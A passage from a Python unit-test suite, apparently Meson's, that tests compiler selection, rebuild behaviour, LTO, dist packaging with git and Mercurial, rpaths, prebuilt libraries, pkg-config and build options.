raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '133 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '110 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '58 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '91 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
@skip_if_not_base_option('b_lto_threads')
def test_lto_threads(self):
if is_cygwin():
raise unittest.SkipTest('LTO is broken on Cygwin.')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
extra_args: T.List[str] = []
if cc.get_id() == 'clang':
if is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
else:
extra_args.append('-D_cargs=-Werror=unused-command-line-argument')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_threads=8'] + extra_args)
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
for e in expected:
self.assertIn(e, s['parameters'])
@skip_if_not_base_option('b_lto_mode')
@skip_if_not_base_option('b_lto_threads')
def test_lto_mode(self):
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() != 'clang':
raise unittest.SkipTest('Only clang currently supports thinLTO')
if cc.linker.id not in {'ld.lld', 'ld.gold', 'ld64', 'lld-link'}:
raise unittest.SkipTest('thinLTO requires ld.lld, ld.gold, ld64, or lld-link')
elif is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_mode=thin', '-Db_lto_threads=8', '-Dc_args=-Werror=unused-command-line-argument'])
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8, mode='thin'))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
self.assertTrue(expected.issubset(set(s['parameters'])), f'Incorrect values for {t["name"]}')
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init, _git_add_all)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}', version: '1.0')".format(name))
return path
def dist_impl(self, vcs_init, vcs_add_all=None, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
subproject('samerepo', required : false)
'''))
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
'''))
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
if vcs_add_all:
vcs_add_all(self.create_dummy_subproject(project_dir, 'samerepo'))
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
# Verify that without --include-subprojects we have files from
# the main project and also files from subprojects part of the
# main vcs repository.
z = zipfile.ZipFile(zip_distfile)
expected = ['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']
if vcs_add_all:
expected += ['disttest-1.4.3/subprojects/',
'disttest-1.4.3/subprojects/samerepo/',
'disttest-1.4.3/subprojects/samerepo/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
# Verify that with --include-subprojects we now also have files
# from tarball and separate vcs subprojects. But not files from
# unused subprojects.
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
expected += ['disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/vcssub/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
if vcs_add_all:
# Verify we can distribute separately subprojects in the same vcs
# repository as the main project.
subproject_dir = os.path.join(project_dir, 'subprojects', 'samerepo')
self.new_builddir()
self.init(subproject_dir)
self.build('dist')
xz_distfile = os.path.join(self.distdir, 'samerepo-1.0.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
tar = tarfile.open(xz_distfile, "r:xz")
self.assertEqual(sorted(['samerepo-1.0',
'samerepo-1.0/meson.build']),
sorted([i.name for i in tar]))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '40 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '151 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '151 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '41 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
# When running under Travis Mac CI, the file updates seem to happen
# too fast so the timestamps do not get properly updated.
# Call this method before file operations in appropriate places
# to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
def test_options_with_choices_changing(self) -> None:
"""Detect when options like arrays or combos have their choices change."""
testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices'))
options1 = str(testdir / 'meson_options.1.txt')
options2 = str(testdir / 'meson_options.2.txt')
# Test that old options are changed to the new defaults if they are not valid
real_options = str(testdir / 'meson_options.txt')
self.addCleanup(os.unlink, real_options)
shutil.copy(options1, real_options)
self.init(str(testdir))
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'b')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
self.wipe()
self.mac_ci_delay()
# When the old options are valid they should remain
shutil.copy(options1, real_options)
self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'c')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b', 'c'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'],
cwd=workdir,
stdout=subprocess.DEVNULL)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']:
try:
comp = env.detect_compiler_for(l, MachineChoice.HOST)
with tempfile.TemporaryDirectory() as d:
comp.sanity_check(d, env)
langs.append(l)
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in {'c', 'cpp', 'd'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in {'java'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
